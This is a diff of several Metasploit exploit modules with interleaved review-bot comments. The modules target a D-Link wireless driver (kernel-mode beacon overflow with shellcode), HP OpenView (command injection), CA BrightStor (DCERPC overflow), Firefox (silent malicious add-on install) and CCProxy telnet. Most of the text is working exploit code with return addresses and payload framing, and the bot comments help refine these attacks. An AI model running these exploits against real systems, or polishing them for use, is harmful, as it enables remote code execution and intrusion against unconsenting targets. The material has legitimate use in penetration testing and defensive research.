blob[22,2] = seq - + blob end def create_frame "\x80" + # type/subtype "\x00" + # flags - "\x00\x00" + # duration - "\xff\xff\xff\xff\xff\xff" + # dst + "\x00\x00" + # duration + eton(datastore['ADDR_DST']) + # dst "\x58\x58\x58\x58\x58\x58" + # src "\x58\x58\x58\x58\x58\x58" + # bssid "\x70\xed" + # sequence number - + # # fixed parameters # - + # timestamp value - Rex::Text.rand_text_alphanumeric(8) + + rand_text_alphanumeric(8) + "\x64\x00" + # beacon interval "\x11\x04" + # capability flags - + # # tagged parameters # - + # ssid tag "\x00" + # tag: SSID parameter set "\x5d" + # len: length is 93 bytes - + # jump into the payload "\x89\xf9" + # mov edi, ecx "\x81\xc1\x7b\x00\x00\x00" + # add ecx, 0x7b "\xff\xe1" + # jmp ecx - + # padding - Rex::Text.rand_text_alphanumeric(79) + - + rand_text_alphanumeric(79) + + # return address [target.ret].pack('V') + - + # vendor specific tag "\xdd" + # wpa "\xff" + # big as we can make it - + # the kernel-mode stager payload.encoded end - -end -end -# milw0rm.com [2006-11-13] +end diff --git a/platforms/windows/remote/2771.rb b/platforms/windows/remote/2771.rb index 1885c9739..431ba9cff 100755 --- a/platforms/windows/remote/2771.rb +++ b/platforms/windows/remote/2771.rb 
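Review bot: In `create_frame` the new `eton(datastore['ADDR_DST']) + # dst` is dead work: both callers in this hunk, `create_beacon` and `create_response`, overwrite bytes 4..9 with `blob[4,6] = dst` immediately after `blob = create_frame`, so the template's destination never reaches the wire and `eton` is re-evaluated for every frame for nothing. Either keep the template constant (the old hard-coded bytes were fine as a placeholder) or drop the per-caller assignment, and say which in a comment, e.g. `# dst placeholder; callers overwrite bytes 4..9 with their own address`. The `seq` fields are also derived differently in the two callers (`% 4096` vs `% 256`) without a comment explaining the difference — presumably deliberate, but worth a line.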
@@ -1,57 +1,72 @@ +## +# $Id: dlink_wifi_rates.rb 9670 2010-07-03 03:19:07Z jduck $ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' -module Msf +class Metasploit3 < Msf::Exploit::Remote + Rank = LowRanking -class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remote - - include Exploit::Lorcon - include Exploit::KernelMode + include Msf::Exploit::Lorcon2 + include Msf::Exploit::KernelMode def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'D-Link DWL-G132 Wireless Driver Beacon Rates Overflow', 'Description' => %q{ - This module exploits a stack overflow in the A5AGU.SYS driver provided - with the D-Link DWL-G132 USB wireless adapter. This stack overflow - allows remote code execution in kernel mode. The stack overflow is triggered - when a 802.11 Beacon frame is received that contains a long Rates information - element. This exploit was tested with version 1.0.1.41 of the - A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer - versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340 - adapter and appear to resolve this flaw, but D-Link does not offer an updated - driver for the DWL-G132. Since this vulnerability is exploited via beacon frames, - all cards within range of the attack will be affected. The tested adapter used - a MAC address in the range of 00:11:95:f2:XX:XX. - - Vulnerable clients will need to have their card in a non-associated state - for this exploit to work. The easiest way to reproduce this bug is by starting - the exploit and then accessing the Windows wireless network browser and - forcing it to refresh. - - D-Link was NOT contacted about this flaw. 
A search of the SecurityFocus - database indicates that D-Link has not provided an official patch or - solution for any of the seven flaws listed at the time of writing: - (BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689). - - This module depends on the Lorcon library and only works on the Linux platform - with a supported wireless card. Please see the Ruby Lorcon documentation - (external/ruby-lorcon/README) for more information. + This module exploits a stack buffer overflow in the A5AGU.SYS driver provided + with the D-Link DWL-G132 USB wireless adapter. This stack buffer overflow + allows remote code execution in kernel mode. The stack buffer overflow is triggered + when a 802.11 Beacon frame is received that contains a long Rates information + element. This exploit was tested with version 1.0.1.41 of the + A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer + versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340 + adapter and appear to resolve this flaw, but D-Link does not offer an updated + driver for the DWL-G132. Since this vulnerability is exploited via beacon frames, + all cards within range of the attack will be affected. The tested adapter used + a MAC address in the range of 00:11:95:f2:XX:XX. + + Vulnerable clients will need to have their card in a non-associated state + for this exploit to work. The easiest way to reproduce this bug is by starting + the exploit and then accessing the Windows wireless network browser and + forcing it to refresh. + + D-Link was NOT contacted about this flaw. A search of the SecurityFocus + database indicates that D-Link has not provided an official patch or + solution for any of the seven flaws listed at the time of writing: + (BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689). + + As of November 17th, 2006, D-Link has fixed the flaw it the latest version of the + DWL-G132 driver (v1.21). 
+ + This module depends on the Lorcon2 library and only works on the Linux platform + with a supported wireless card. Please see the Ruby Lorcon2 documentation + (external/ruby-lorcon/README) for more information. }, - - 'Authors' => + 'Author' => [ 'hdm', # discovery, exploit dev 'skape', # windows kernel ninjitsu - 'Johnny Cache ' # making all of this possible + 'Johnny Cache ' # making all of this possible ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: 3583 $', + 'Version' => '$Revision: 9670 $', 'References' => [ + ['CVE', '2006-6055'], + ['OSVDB', '30296'], + ['URL', 'http://projects.info-pull.com/mokb/MOKB-13-11-2006.html'], ['URL', 'ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip'], ], 'Privileged' => true, - + 'DefaultOptions' => { 'EXITFUNC' => 'thread', @@ -63,7 +78,7 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot 'Space' => 1000 }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # Windows XP SP2 with the latest updates # 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519) @@ -71,9 +86,9 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot { 'Ret' => 0x8066662c, # jmp edi 'Platform' => 'win', - 'Payload' => + 'Payload' => { - 'ExtendedOptions' => + 'ExtendedOptions' => { 'Stager' => 'sud_syscall_hook', 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 @@ -81,18 +96,18 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot 'KiIdleLoopAddress' => 0x804dbb27, } } - } + } ], - + # Windows XP SP2 install media, no patches # 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158) [ 'Windows XP SP2 (5.1.2600.2180), A5AGU.sys 1.0.1.41', { 'Ret' => 0x804f16eb, # jmp edi 'Platform' => 'win', - 'Payload' => + 'Payload' => { - 'ExtendedOptions' => + 'ExtendedOptions' => { 'Stager' => 'sud_syscall_hook', 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 
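Review bot: The new Description text in this hunk reads `As of November 17th, 2006, D-Link has fixed the flaw it the latest version of the DWL-G132 driver (v1.21).` — `it` should be `in`; this string is presumably what users see in the module info, so it is worth fixing while the block is being rewritten. The same paragraph now says "stack buffer overflow" three times in three consecutive lines; the second and third occurrences could simply read "overflow". The new fix sentence also sits directly after "D-Link was NOT contacted about this flaw", so a short lead-in such as "Update:" would make clear it postdates the rest of the text.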
@@ -100,72 +115,73 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot 'KiIdleLoopAddress' => 0x804dc0c7, } } - } - ] + } + ] ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 13 2006')) - - 'DefaultTarget' => 0 - )) - register_options( [ OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']), OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]) ], self.class) end - + def exploit open_wifi - + stime = Time.now.to_i rtime = datastore['RUNTIME'].to_i count = 0 - + print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...") - while (stime + rtime > Time.now.to_i) + while (stime + rtime > Time.now.to_i) wifi.write(create_beacon) select(nil, nil, nil, 0.10) if (count % 100 == 0) - + count += 1 - + # Exit if we get a session break if session_created? end - + print_status("Completed sending beacons.") end +# +# The following research was provided by Gil Dabah of ZERT # # The long rates field bug can be triggered three different ways (at least): # 1) Send a single rates IE with valid rates up front and long data -# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data (thanks gil!) 
+# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data # 3) Send two IE rates fields, with the second one containing the long data (this exploit) # + def create_beacon - ssid = Rex::Text.rand_text_alphanumeric(6) - bssid = ("\x00" * 2) + Rex::Text.rand_text(4) + ssid = rand_text_alphanumeric(6) + bssid = ("\x00" * 2) + rand_text(4) src = ("\x90" * 4) + "\xeb\x2b" seq = [rand(255)].pack('n') - buff = Rex::Text.rand_text(75) + buff = rand_text(75) buff[0, 2] = "\xeb\x49" buff[71, 4] = [target.ret].pack('V') - + frame = "\x80" + # type/subtype "\x00" + # flags - "\x00\x00" + # duration - "\xff\xff\xff\xff\xff\xff" + # dst + "\x00\x00" + # duration + eton(datastore['ADDR_DST']) + # dst src + # src - bssid + # bssid - seq + # seq - Rex::Text.rand_text(8) + # timestamp value + bssid + # bssid + seq + # seq + rand_text(8) + # timestamp value "\x64\x00" + # beacon interval "\x00\x05" + # capability flags - + # ssid tag "\x00" + ssid.length.chr + ssid + @@ -176,14 +192,11 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot "\x03" + "\x01" + channel.chr + # eip was his name-o - "\x01" + buff.length.chr + buff + + "\x01" + buff.length.chr + buff + payload.encoded - + return frame end end -end - -# milw0rm.com [2006-11-13] diff --git a/platforms/windows/remote/28188.rb b/platforms/windows/remote/28188.rb index e2e9e158c..b6bc3bf79 100755 --- a/platforms/windows/remote/28188.rb +++ b/platforms/windows/remote/28188.rb 
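Review bot: `create_beacon` now takes the destination field from `eton(datastore['ADDR_DST'])` instead of the fixed broadcast address, but `ADDR_DST` is registered as a plain `OptString` and nothing in the hunk checks its shape, so a value that is not six colon-separated hex octets reaches `eton` unchecked; what `eton` does with such input is not visible here, but any failure would surface mid-frame rather than as an option error. A guard at the top of `exploit`, before `open_wifi`, keeps the error next to its cause: `raise ArgumentError, "ADDR_DST must be a MAC address (aa:bb:cc:dd:ee:ff)" unless datastore['ADDR_DST'] =~ /\A(?:[0-9a-f]{2}:){5}[0-9a-f]{2}\z/i`. The option description in `register_options` could also state the expected format. `exploit` is contained in the hunk; `create_beacon` continues past its end.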
@@ -128,9 +128,9 @@ class Metasploit3 < Msf::Exploit::Remote # due to the fake activation). But this line also will kill other cscript # legit processes which could be running on the target host. Because of it # the exploit has a Manual ranking - command = ""127.0.0.1 && " - command << cmd.gsub(/&/, "&") - command << " && taskkill /F /IM cscript.exe "" + command = ""127.0.0.1 && " + command << cmd.gsub(/&/, "&") + command << " && taskkill /F /IM cscript.exe "" res = send_soap_request("OPCACTIVATE", "omHost", command) diff --git a/platforms/windows/remote/28480.rb b/platforms/windows/remote/28480.rb deleted file mode 100755 index d0623107e..000000000 --- a/platforms/windows/remote/28480.rb +++ /dev/null 
@@ -1,92 +0,0 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - - Rank = AverageRanking - - include Msf::Exploit::Remote::DCERPC - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup - r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow - the buffer and execute arbitrary code. - }, - 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'OSVDB', '68330'], - [ 'URL', 'http://www.metasploit.com/users/mc' ], - ], - 'Privileged' => true, - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, - 'Payload' => - { - 'Space' => 500, - 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e", - 'StackAdjustment' => -3500, - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'BrightStor ARCserve r11.5/Windows 2003', { 'Ret' => 0x28eb6493 } ], - ], - 'DisclosureDate' => 'Oct 4 2010', - 'DefaultTarget' => 0)) - - register_options([ Opt::RPORT(6502) ], self.class) - end - - def exploit - - connect - - handle = dcerpc_handle('62b93df0-8b02-11ce-876c-00805f842837', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) - print_status("Binding to #{handle} ...") - - dcerpc_bind(handle) - print_status("Bound to #{handle} ...") - - request = "\x00\x04\x08\x0c\x05\x00\x00\x00\x00\x00" - request << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - - dcerpc.call(0x2B, request) - - sploit = NDR.long(4) - sploit << NDR.string(rand_text_alpha_upper(1002) + [target.ret].pack('V') + payload.encoded + "\x00") - - print_status("Trying target #{target.name}...") - - begin - dcerpc_call(0x8A, sploit) - rescue 
Rex::Proto::DCERPC::Exceptions::NoResponse - end - - handler - disconnect - - end - -end -=begin -/* opcode: 0x8A, address: 0x100707D0 */ - -long sub_100707D0 ( - [in] handle_t arg_1, - [in] long arg_2, - [in][ref][string] char * arg_3 -); -=end \ No newline at end of file diff --git a/platforms/windows/remote/30474.rb b/platforms/windows/remote/30474.rb deleted file mode 100755 index 55410ca7d..000000000 --- a/platforms/windows/remote/30474.rb +++ /dev/null 
@@ -1,116 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::BrowserExploitServer - include Msf::Exploit::EXE - include Msf::Exploit::Remote::FirefoxAddonGenerator - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution', - 'Description' => %q{ - On versions of Firefox from 5.0 to 15.0.1, the InstallTrigger global, when given - invalid input, would throw an exception that did not have an __exposedProps__ - property set. By re-setting this property on the exception object's prototype, - the chrome-based defineProperty method is made available. - - With the defineProperty method, functions belonging to window and document can be - overriden with a function that gets called from chrome-privileged context. From here, - another vulnerability in the crypto.generateCRMFRequest function is used to "peek" - into the context's private scope. Since the window does not have a chrome:// URL, - the insecure parts of Components.classes are not available, so instead the AddonManager - API is invoked to silently install a malicious plugin. 
- }, - 'License' => MSF_LICENSE, - 'Author' => [ - 'Mariusz Mlynski', # discovered CVE-2012-3993 - 'moz_bug_r_a4', # discovered CVE-2013-1710 - 'joev' # metasploit module - ], - 'DisclosureDate' => "Aug 6 2013", - 'References' => [ - ['CVE', '2012-3993'], # used to install function that gets called from chrome:// (ff<15) - ['OSVDB', '86111'], - ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=768101'], - ['CVE', '2013-1710'], # used to peek into privileged caller's closure (ff<23) - ['OSVDB', '96019'] - ], - 'BrowserRequirements' => { - :source => 'script', - :ua_name => HttpClients::FF, - :ua_ver => lambda { |ver| ver.to_i.between?(5, 15) } - } - )) - - register_options([ - OptString.new('CONTENT', [ false, "Content to display inside the HTML .", '' ] ) - ], self.class) - end - - def on_request_exploit(cli, request, target_info) - if request.uri.match(/\.xpi$/i) - print_status("Sending the malicious addon") - send_response(cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' }) - else - print_status("Sending HTML") - send_response_html(cli, generate_html(target_info)) - end - end - - def generate_html(target_info) - injection = if target_info[:ua_ver].to_i == 15 - "Function.prototype.call.call(p.__defineGetter__,obj,key,runme);" - else - "p2.constructor.defineProperty(obj,key,{get:runme});" - end - - %Q| - - - #{datastore['CONTENT']} - - - - - | - end -end \ No newline at end of file diff --git a/platforms/windows/remote/4360.rb b/platforms/windows/remote/4360.rb index cf80569c5..13deb72e4 100755 --- a/platforms/windows/remote/4360.rb +++ b/platforms/windows/remote/4360.rb 
@@ -1,110 +1,82 @@ ## -# $Id$ +# $Id: ccproxy_telnet_ping.rb 9179 2010-04-30 08:40:19Z jduck $ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/projects/Framework/ +# http://metasploit.com/framework/ ## require 'msf/core' -module Msf +class Metasploit3 < Msf::Exploit::Remote + Rank = AverageRanking -class Exploits::Windows::Proxy::CCProxy_Telnet_Ping < Msf::Exploit::Remote - - include Exploit::Remote::Tcp + include Msf::Exploit::Remote::Tcp - def initialize(info = {}) - super(update_info(info, + def initialize(info = {}) + super(update_info(info, 'Name' => 'CCProxy <= v6.2 Telnet Proxy Ping Overflow', 'Description' => %q{ - This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet service. - The stack is overwritten when sending an overly long address to the 'ping' command. + This module exploits the YoungZSoft CCProxy <= v6.2 suite + Telnet service. The stack is overwritten when sending an overly + long address to the 'ping' command. }, 'Author' => [ 'Patrick Webster ' ], - 'Arch' => [ ARCH_X86 ], + 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', + 'Version' => '$Revision: 9179 $', 'References' => - [ - [ 'BID', '11666 ' ], - [ 'CVE', '2004-2416' ], - [ 'MIL', '621' ], - [ 'OSVDB', '11593' ], - ], + [ + [ 'CVE', '2004-2416' ], + [ 'OSVDB', '11593' ], + [ 'BID', '11666 ' ], + [ 'URL', 'http://milw0rm.com/exploits/621' ], + ], 'Privileged' => false, 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, + { + 'EXITFUNC' => 'thread', + }, 'Payload' => - { + { 'Space' => 1012, - 'BadChars' => "\x00\x07\x08\x0a\x0d", + 'BadChars' => "\x00\x07\x08\x0a\x0d\x20", }, 'Platform' => ['win'], 'Targets' => - [ - # Patrick - Tested OK 2007/08/19. 
W2K SP0, W2KSP4, XP SP0, XP SP2 EN. [ - 'Windows 2000 Pro All - English', - { - 'Ret' => 0x75023411, # call esi ws2help.dll - } + # Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN. + [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll + [ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll + [ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll + [ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll + [ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll ], - [ - 'Windows 2000 Pro All - Italian', - { - 'Ret' => 0x74fd2b81, # call esi ws2help.dll - } - ], - [ - 'Windows 2000 Pro All - French', - { - 'Ret' => 0x74fa2b22, # call esi ws2help.dll - } - ], - [ - 'Windows XP SP0/1 - English', - { - 'Ret' => 0x71aa1a97, # call esi ws2help.dll - } - ], - [ - 'Windows XP SP2 - English', - { - 'Ret' => 0x71aa1b22, # call esi ws2help.dll - } - ], - ], 'DisclosureDate' => 'Nov 11 2004')) - - register_options( + + register_options( [ Opt::RPORT(23), ], self.class) end - def autofilter - false - end - - def check + def check connect banner = sock.get_once(-1,3) + disconnect if (banner =~ /CCProxy Telnet Service Ready/) - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Appears end - return Exploit::CheckCode::Safe + return Exploit::CheckCode::Safe end def exploit connect - + sploit = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7) sock.put(sploit + "\r\n") @@ -113,6 +85,3 @@ class Exploits::Windows::Proxy::CCProxy_Telnet_Ping < Msf::Exploit::Remote end end -end - -# milw0rm.com [2007-09-03]
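Review bot: In the rewritten `check`, a `nil` banner — `sock.get_once(-1,3)` returning nothing within the timeout — falls through the regex test and is reported as `Exploit::CheckCode::Safe`, so a slow or filtered service is classified as not vulnerable rather than undetermined; the added `disconnect` before the comparison is right, but the nil case deserves its own branch, e.g. `return Exploit::CheckCode::Unknown if banner.nil?` placed directly after `disconnect`. The `'BadChars'` change (the added `\x20`) carries no comment naming why that byte became a bad character, which makes it easy to drop in a later cleanup. The `autofilter` override returning false was removed and nothing in the hunk records the reason. `exploit` continues past the end of the hunk.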